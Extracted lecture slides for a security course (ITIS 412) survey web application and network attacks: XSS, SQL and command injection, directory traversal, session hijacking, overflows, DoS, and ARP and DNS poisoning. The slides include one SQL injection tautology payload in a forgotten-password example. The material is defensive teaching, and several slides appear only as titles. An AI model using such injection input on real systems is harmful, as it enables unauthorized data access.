Professional Documents
Culture Documents
Chapter 3 - Application & Networking-Based Attacks
Chapter 3 - Application & Networking-Based Attacks
Chapter 3 - Application & Networking-Based Attacks
2 ITIS 412
Conceptual Networked Computer System
3 ITIS 412
Server-Side Web Application Attacks
Content provided for users who are “surfing the Web” is
generated by a software application running on a server
In providing web services to clients, web servers also
expose those same services to attackers
Important characteristic of server-side web applications
to create dynamic content based on inputs from user
4 ITIS 412
Server-Side Web
Application Infrastructure
6 ITIS 412
Securing Web Applications
Securing server-side web applications often considered
more difficult than protecting other systems
Traditional network security devices cannot always block
web application attacks because many traditional network
security devices ignore the content of HTTP traffic, which
is the vehicle of web application attacks
7 ITIS 412
Zero Day Attacks
Many web application attacks (as well as other application
attacks) exploit previously unknown vulnerabilities
Zero day attacks - Exploit previously unknown
vulnerabilities so victims have no time to prepare or
defend
8 ITIS 412
Common Application Attacks
Many server-side web application attacks target the input
that the applications accept from users
Common web application attacks:
Cross-site scripting
SQL injection
XML injection
Command injection/directory traversal
9 ITIS 412
Cross-Site Scripting
Not all attacks on websites are designed to steal content or
deface it
Some attacks use web server as a platform to launch attacks on
other computers that access it
Cross-site scripting (XSS) - Injects scripts into web
application server to direct attacks at unsuspecting clients
It typically allows attackers to hijack other users' online
accounts on the affected website.
Many web applications are designed to customize content for
user by taking what user enters and then displaying that input
back to user
Cross site scripting attacks can be broken down into two types:
stored and reflected.
10 ITIS 412
Cross Site Scripting (XSS) Attacks
targets the users of the web application are the ones at risk.
One of the most frequent targets are websites that allow users
11 ITIS 412
Stored XSS Attack Example
While browsing an e-commerce website, the attacker
adds an HTML tag to be embedded in the site’s
comments section.
The embedded tags become a permanent feature of the
page, causing the browser to analyze it with the rest of the
source code every time the page is opened.
12 ITIS 412
Stored XSS Attack
13 ITIS 412
What is Reflected Cross-site Scripting ?
It is an attack vector that arise when data is copied from a
request and echoed into the application's immediate
response in an unsafe way.
An attacker can use the vulnerability to construct a request
that will cause JavaScript code (supplied by the attacker)
to execute within the user's browser.
The attacker-supplied code can perform a wide variety of
actions, such as stealing the victim's session token or login
credentials, performing arbitrary actions on the victim's
behalf, and logging their keystrokes.
14 ITIS 412
Reflected XSS Attack Example
15 ITIS 412
SQL Injection
SQL (Structured Query Language) - Used to manipulate
data stored in relational database
SQL Injection - Targets SQL servers by introducing
malicious commands
SQL injection is a code injection technique, used to attack
data-driven applications, in which evil SQL statements are
inserted into an entry field for execution (e.g. to dump the
database contents to the attacker).
20 ITIS 412
SQL Injection Statements
21 ITIS 412
Forgotten Password Example
Forgotten password example:
Attacker enters incorrectly formatted e-mail address
Response lets attacker know whether input is being
validated
Attacker enters email field in SQL statement
Statement processed by the database
Example statement:
SELECT fieldlist FROM table WHERE
field = ‘whatever’ or ‘a’=‘a’
Result is all user email addresses will be displayed
22 ITIS 412
XML (Extensible Markup Language)
Markup language - Method for adding annotations (or
comments) to text
Example is HTML:
Uses tags surrounded by brackets
Instructs browser to display text in specific format
XML (Extensible Markup Language):
Carries data instead of indicating how to display it
No predefined set of tags
Users define their own tags
23 ITIS 412
XML Attack
24 ITIS 412
Directory Traversal/Command Injection
Web server users typically restricted to root directory
Users may be able to access subdirectories but not parallel
or higher level directories
Helps to protect sensitive files
25 ITIS 412
Directory Traversal
Directory Traversal is an HTTP attack which allows
attackers to access restricted directories and execute
commands outside of the web server's .
The goal of this attack is to use an affected application to
gain unauthorized access to the file system. This attack
exploits a lack of security
IT Uses malformed input or takes advantage of
vulnerability to move from root directory to restricted
directories
26 ITIS 412
Directory Traversal Attack
27 ITIS 412
Command injection
Command injection – is an attack in which the goal is execution
of arbitrary commands on the host operating system via a
vulnerable application.
command injection attack occurs when an attacker attempts to
execute system level commands through a vulnerable web
application.
29 ITIS 412
Drive-By Download
Drive-by download:
Client computer compromised simply by viewing a Web
page
Attackers inject content into vulnerable Web server to
gain access to server’s operating system
Attackers craft a zero pixel frame to avoid visual
detection
Embed an HTML document inside main document
Client’s browser downloads malicious script
Instructs computer to download malware
30 ITIS 412
HTTP Header
HTTP header consists of fields that characterize data
being transmitted
Header fields are comprised of:
Field name
Colon
Field value
Example Content-length: 49.
HTTP header field names and values may be any
application-specific strings, but core set standardized by
Internet Engineering Task Force (IETF)
31 ITIS 412
HTTP Header Fields
32 ITIS 412
Header Manipulation
HTTP header manipulation - Attack modifies HTTP
headers
HTTP header manipulation is not actual attack but rather
vehicle through which other attacks like (XSS) can be
launched.
HTTP header manipulation allows an attacker to pass
malicious instructions from own malicious website or
through an infected site to the web browser via HTTP
headers
33 ITIS 412
HTTP Header Attacks
Examples of HTTP header attacks:
Referer - Can bypass security by modifying Referer
field to hide fact came from another site
Accept-Language – Because some web applications
pass contents of field directly to database attacker
can inject SQL command by modifying header
Response splitting - Inserting a CRLF in an HTTP
header can give attackers control of the remaining
HTTP headers and body of the response
34 ITIS 412
Cookies
Cookies - Store user-specific information on user’s
local computer
Web sites use cookies to identify repeat visitors
Examples of information:
Travel Web sites may store user’s travel itinerary
Personal information provided when visiting a site
Only Web site that created a cookie can read it
35 ITIS 412
Types of Cookies
First-party cookie - Cookie created by Web site user
currently visiting
Third-party cookie - Site advertisers (third parties) place
cookie to record user preferences
Session cookie - Stored in RAM and expires when
browser is closed
Persistent cookie - Recorded on computer’s hard drive
and does not expire when browser closes
36 ITIS 412
Locally Shared Object (LSO)
Locally shared object (LSO) or Flash cookie - named
after the Adobe Flash player
Different from regular cookies:
Store data more complex
Store up to 100 KB of data from a website (25 times
data as regular cookie)
Cannot be deleted through browser's normal
configuration settings
Saved in multiple locations on hard drive
Can be used to reinstate regular cookies that user
deleted or blocked
37 ITIS 412
Risks of Cookies
Cookies have security and privacy risks
First-party cookies can be stolen and used to impersonate
the user
Third-party cookies can be used to track the browsing or
buying habits of a user
When multiple websites are serviced by a single
marketing organization, cookies can be used to track
browsing habits on all client’s site
38 ITIS 412
Attachments
Attachments - Files that are coupled to email messages
Malicious attachments commonly used to spread viruses,
Trojans, and other malware when opened
Most users routinely open any email attachment received
even if from an unknown sender
Attackers often include information in the subject line that
entices even reluctant users to open the attachment, such
as a current event
39 ITIS 412
Session Token
User accessing secure web app needs to be verified to
prevent an imposter from “jumping in” to interaction
Session token - Verification through random string
assigned to interaction between user and web application
currently being accessed (session)
Web application server assigns a unique session token
Each subsequent request from user’s web browser to web
application contains session token verifying user identity
40 ITIS 412
Session Hijacking
Session hijacking - Attacker attempts to impersonate the
user by using his/her session token
Attacker can attempt to obtain session token:
Use XSS or other attacks to steal the session token
cookie from the victim’s computer
Eavesdropping on the transmission
Guessing the session token (successful if generation of
session tokens not truly random)
41 ITIS 412
Session Hijacking Attack
42 ITIS 412
Plug-Ins and Add-Ons
Tools can be added to enhance user’s interaction with
website through web browser
Plug-in - Third-party library (Java, Adobe Flash player,
Apple QuickTime, Adobe Acrobat Reader) that attaches
to web browser and can be embedded inside a webpage
(but affects only specific page)
Add-ons or extensions - Tools that add functionality to
the web browser itself
43 ITIS 412
Malicious Add-Ons
Attackers can create malicious add-ons to launch attacks
against user’s computer
ActiveX - Set of rules for how applications under the
Microsoft Windows operating system should share
information
ActiveX controls (add-ons) - Specific way of
implementing ActiveX and are sometimes called ActiveX
applications
ActiveX controls can be invoked from webpages through
the use of a scripting language or directly by HTML
command
44 ITIS 412
Impartial Overflow Attacks
“Impartial” attacks can target either server or client
Many of these attacks designed to “overflow” areas of
memory with instructions from the attacker
Types of attacks:
Buffer overflow attacks
Integer overflow attacks
Arbitrary/remote code execution attacks.
45 ITIS 412
Buffer Overflow Attack
Buffer overflow attack - Process attempts to store
data in RAM beyond boundaries of fixed-length
storage buffer
Data overflows into adjacent memory locations
Attacker can change “return address” of memory
location of code and redirect to memory address
containing malware code
46 ITIS 412
Buffer Overflow Attack
47 ITIS 412
Integer Overflow
Integer overflow - Condition occurs when result of
arithmetic operation (addition or multiplication)
exceeds the maximum size of the integer type used to
store it
When overflow occurs, the interpreted value then
wraps around from maximum value to minimum
value
48 ITIS 412
Integer Overflow Attack
Example:
8-bit signed integer has a maximum value of 127 and a
minimum value of ‒128
If the value 127 is stored in a variable and 1 is added to
it, the sum exceeds the maximum value for this integer
type
Wraps around to become ‒128.
Integer overflow attack - Attacker changes value of
variable to something outside the range the
programmer had intended by using an integer
overflow
49 ITIS 412
Arbitrary/Remote Code Execution
Arbitrary/remote code execution - Allows attacker to
run programs and execute commands on different
computer
Once under the attacker’s control, computer can perform
virtually any command from the attacker
Arbitrary/remote code execution attacks often take
advantage of malicious attachments like Microsoft Visio
file or PDF file
50 ITIS 412
Network Attacks
Attackers place high priority on targeting networks
Exploiting single vulnerability may expose hundreds
or thousands of devices to an attacker
Types of attacks that target a network or network
process:
Denial of service
Interception
Poisoning
Attacks on access rights
51 ITIS 412
Denial of Service (DoS)
Denial of service (DoS) - Attempts to prevent system
from performing normal functions
Distributed denial of service (DDoS) - Uses thousands
zombie computers in botnet
Ping flood attack - Ping utility used to send large number
of echo request messages and overwhelms server
Smurf attack - Ping request with originating address
changed (spoofing) and appears as if target computer is
asking for response from all computers on the network
52 ITIS 412
SYN Flood Attack
SYN flood attack - Takes advantage of procedures for
establishing connection
Attacker sends SYN segments in IP packets to server but
modifies source address of each packet to computer
addresses that do not exist or cannot be reached
Server continues to wait for a response (which is not
coming) while receiving more false requests and keeping
more lines open for responses
Server ultimately runs out of resources and can no longer
respond to legitimate requests
53 ITIS 412
SYN Flood Attack
54 ITIS 412
Interception
Man-in-the-middle - Interception of legitimate
communication
Forging a fictitious response to the sender
Passive attack records transmitted data, active attack alters
contents of transmission before sending to recipient
Replay - Similar to passive man-in-the-middle attack
Replay makes a copy of the transmission before sending it
to the recipient for use at a later time (the man-in-the-
middle replays it)
55 ITIS 412
ARP Poisoning
ARP poisoning
Attacker modifies MAC address in ARP cache to
point to different computer
56 ITIS 412
Attacks From ARP Poisoning
57 ITIS 412
DNS Poisoning
Domain Name System - Current basis for name
resolution to IP address
DNS poisoning - Substitutes DNS addresses to
redirect computer to another device
Two locations for DNS poisoning:
Local host table
External DNS server
58 ITIS 412
Sample
HOSTS
file
59 ITIS 412
DNS Poisoning
60 ITIS 412
Attacks on Access Rights
Privilege escalation - Exploiting software
vulnerability to gain access to restricted data
Two types of privilege escalation:
Vertical privilege escalation exist - User with lower
privilege uses privilege escalation to grant self access
functions reserved for higher-privilege users
Horizontal privilege escalation - User with restricted
privileges accesses the different restricted functions of a
similar user
61 ITIS 412
Transitive Trust
Transitive - Relation with a property so that if a
relation exists been A and B, and there is also a
relation between B and C, then there is a relation
between A and C
Transitive trust - If Alice trusts Bob, and Bob trusts
Carol, then Alice trusts Carol
62 ITIS 412
Transitive Access
Transitive trust can result in transitive access: System 1
can access System 2, and because System 2 can access
System 3, then System 1 can access System 3
Intention may not be for System 1 to access System 3, but
instead for System 1 to be restricted to accessing only
System 2
Inadvertent and unauthorized access can result in serious
security risks
63 ITIS 412